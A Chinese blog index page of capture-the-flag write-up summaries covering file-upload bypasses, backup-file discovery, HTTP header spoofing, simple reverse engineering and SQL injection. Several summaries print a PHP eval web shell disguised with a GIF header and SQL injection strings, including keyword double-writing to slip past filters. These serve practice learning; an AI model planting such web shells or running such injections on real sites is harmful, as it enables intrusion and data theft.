上一页 1 ··· 5 6 7 8 9 10 11 12 13 下一页
摘要: 这个题我有两个思路。 1.绕过前端Js验证,phtml拓展名的应用 首先打开之后,写一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 发现不允许上传phtml文件 猜想有js验证 F12查看 果然,将其删除 阅读全文
posted @ 2020-10-15 01:35 夜布多 阅读(609) 评论(0) 推荐(0) 编辑
摘要: 打开之后啥信息都没有 题目的提示是backupFile备份文件 备份文件一般的后缀名为 .rar .zip .7z .tar.gz .bak .swp .txt .html .bak可以用dirsearch 扫 链接: dirsearch. 使用,试了很多备份文件,这里的备份文件是index.php 阅读全文
posted @ 2020-10-15 00:27 夜布多 阅读(212) 评论(0) 推荐(0) 编辑
摘要: 发现让我们上传文件, 首先在桌面创建一个y.phtml的文件,内容为 GIF89a <script language="php">eval($_POST['shell']);</script> 然后我们将它上传,提交时使用bp截取,修改一下格式,再放行 我们使用蚁剑连接,猜测路径为upload 完整 阅读全文
posted @ 2020-10-15 00:07 夜布多 阅读(538) 评论(0) 推荐(0) 编辑
摘要: 发现有一个php 访问 发现这里需要在http报头里加上一个Referer 于是伪造Referer: https://www.Sycsecret.com 这里需要使用"Syclover"浏览器,即User-Agent头为Syclover 修改发包 发现他让我本地访问,这里加入一个X-Forwarde 阅读全文
posted @ 2020-10-14 23:33 夜布多 阅读(276) 评论(0) 推荐(0) 编辑
摘要: 拖到APKIDE 搜索flag,得到flag 阅读全文
posted @ 2020-10-13 23:49 夜布多 阅读(123) 评论(0) 推荐(0) 编辑
摘要: 发现有个UPX的壳儿,拖到OD 看到个显眼的popad,点第一个断点jmp 用自带工具脱壳儿 保存之后拖到ida, 明显flag{HappyNewYear!} 阅读全文
posted @ 2020-10-13 23:32 夜布多 阅读(309) 评论(0) 推荐(0) 编辑
摘要: 进入ida跟进伪代码 看到了个flag,肯定不是 转换为字符,发现 把刚刚那一串flag里面的i和r替换成1 flag{hack1ng_fo1_fun} 阅读全文
posted @ 2020-10-13 00:13 夜布多 阅读(135) 评论(0) 推荐(0) 编辑
摘要: 下载将exe文件拖到ida shift+F12, 发现了这个,双击跟进, 然后选中在双击 光标选中之后F5查看伪代码 发现这个应该是将ASCII为111 的替换为 48,查询后是o换成0 这里发现是str1接受flag 然后将Str1与Str2进行比较,如果相等就this is the right 阅读全文
posted @ 2020-10-12 23:50 夜布多 阅读(794) 评论(0) 推荐(0) 编辑
摘要: 首先万能密码注入 然后换个用户名注入查询 ?username=1' order by 4%23&password=1 因为在url里输入的,所以,要把# 换成%23 发现最多3个字段 ?username=1' union select 1,2,group_concat(table_name) fro 阅读全文
posted @ 2020-10-12 16:58 夜布多 阅读(225) 评论(0) 推荐(0) 编辑
摘要: 打开之后,尝试登录注入没啥用,发现or被过滤了,联合查询,union select 也被过滤了。 ?username=1' uniunionon selselectect 1,2,3%23 &password=123 双写被过滤的关键字注入查询 然后直接爆数据库,发现被过滤了很多关键字,直接双写 ? 阅读全文
posted @ 2020-10-11 23:27 夜布多 阅读(237) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 下一页